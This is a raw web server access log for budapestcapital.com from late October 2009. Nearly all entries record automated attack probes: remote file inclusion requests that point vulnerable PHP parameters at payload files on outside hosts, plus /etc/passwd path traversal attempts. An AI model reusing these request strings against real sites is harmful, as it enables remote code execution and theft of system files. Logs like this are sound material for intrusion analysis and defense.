222.122.46.179 - - [31/Oct/2009:23:34:04 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:23:34:31 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:23:34:31 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:23:34:31 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
62.149.216.70 - - [31/Oct/2009:23:38:56 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
62.149.216.70 - - [31/Oct/2009:23:38:56 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
62.149.216.70 - - [31/Oct/2009:23:38:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:44:13 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:44:13 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:44:13 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:45:49 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:45:49 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:45:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:47:03 -0700] "GET /index.php?ex=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
74.86.77.2 - - [31/Oct/2009:23:47:04 -0700] "GET /index.php?ex=./../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "-" "www.budapestcapital.com"
121.78.116.203 - - [31/Oct/2009:23:49:30 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [31/Oct/2009:23:49:30 -0700] "GET /logs/access_090329.log//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [31/Oct/2009:23:49:30 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:49:33 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:49:33 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
220.80.108.81 - - [31/Oct/2009:23:49:33 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.78.116.203 - - [31/Oct/2009:23:52:41 -0700] "GET /logs/access_090329.log%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
213.79.101.98 - - [31/Oct/2009:23:57:38 -0700] "GET /logs/access_090329.log//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
213.79.101.98 - - [31/Oct/2009:23:57:38 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
213.79.101.98 - - [31/Oct/2009:23:57:38 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:06 -0700] "GET /logs/access_090329.log//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:06 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:07 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:10 -0700] "GET /logs/access_090329.log//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:10 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
91.202.253.13 - - [31/Oct/2009:23:59:10 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.budapestcapital.com"
213.79.101.98 - - [31/Oct/2009:23:59:59 -0700] "GET /logs/access_090329.log%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [01/Nov/2009:00:00:14 -0700] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [01/Nov/2009:00:00:24 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [01/Nov/2009:00:00:25 -0700] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [01/Nov/2009:00:00:25 -0700] "GET /logs/access_090329.log//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
125.251.99.2 - - [01/Nov/2009:00:03:48 -0700] "GET /logs/access_090329.log%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:02 -0700] "GET /logs/access.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:02 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:02 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:14 -0700] "GET /logs/access.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:14 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:14 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:16 -0700] "GET /logs/access_090401.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:20 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:20 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:20 -0700] "GET /logs/access.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:45 -0700] "GET /logs/access_090401.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:10:48 -0700] "GET /logs/access_090401.log%20%20/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:00 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:00 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:00 -0700] "GET /logs/access_090329.log/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:04 -0700] "GET /logs/access_090401.log/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:06 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:10 -0700] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:10 -0700] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:11 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:11 -0700] "GET /logs/access_090401.log/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:12 -0700] "GET /logs/access_090329.log/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:12 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:13 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:13 -0700] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:15 -0700] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:17 -0700] "GET /index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:17 -0700] "GET /logs/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
58.230.118.81 - - [01/Nov/2009:00:13:17 -0700] "GET /logs/access_090329.log/index0.php?show=http://eng.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:38 -0700] "GET /logs/access_090501.log%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:13:38 -0700] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:14:46 -0700] "GET /logs/access_090331.log%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
121.136.177.137 - - [01/Nov/2009:00:14:55 -0700] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.109.248.165 - - [01/Nov/2009:00:18:42 -0700] "GET /logs/access_090501.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.budapestcapital.com"
208.109.248.165 - - [01/Nov/2009:00:18:42 -0700] "GET /logs/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.budapestcapital.com"
208.109.248.165 - - [01/Nov/2009:00:18:42 -0700] "GET /solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.budapestcapital.com"
208.109.248.165 - - [01/Nov/2009:00:18:49 -0700] "GET /logs/access_090331.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:18:52 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:18:52 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:18:52 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
89.104.82.184 - - [01/Nov/2009:00:18:56 -0700] "GET /logs/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.budapestcapital.com"
89.104.82.184 - - [01/Nov/2009:00:18:56 -0700] "GET /solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.budapestcapital.com"
89.104.82.184 - - [01/Nov/2009:00:18:56 -0700] "GET /logs/access_090501.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.budapestcapital.com"
89.104.82.184 - - [01/Nov/2009:00:19:00 -0700] "GET /logs/access_090331.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.budapestcapital.com"
125.245.165.135 - - [01/Nov/2009:00:20:19 -0700] "GET /logs/access_090501.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.budapestcapital.com"
125.245.165.135 - - [01/Nov/2009:00:20:19 -0700] "GET /logs/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.budapestcapital.com"
125.245.165.135 - - [01/Nov/2009:00:20:19 -0700] "GET /solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.budapestcapital.com"
125.245.165.135 - - [01/Nov/2009:00:20:27 -0700] "GET /logs/access_090331.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:22:15 -0700] "GET /logs/access_090501.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
218.234.21.178 - - [01/Nov/2009:00:22:36 -0700] "GET /logs/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.budapestcapital.com"
218.234.21.178 - - [01/Nov/2009:00:22:36 -0700] "GET /solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.budapestcapital.com"
218.234.21.178 - - [01/Nov/2009:00:22:36 -0700] "GET /logs/access_090501.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.budapestcapital.com"
218.234.21.178 - - [01/Nov/2009:00:22:37 -0700] "GET /logs/access_090331.log/solpot.html?body=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:26:36 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:26:36 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:26:36 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
124.115.6.11 - - [01/Nov/2009:00:42:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:07 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:07 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:07 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:16 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:18 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:18 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:18 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:37 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:37 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:43:45 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:44:55 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [01/Nov/2009:00:44:55 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:00:48:00 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:00:48:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
201.130.3.108 - - [01/Nov/2009:00:48:01 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
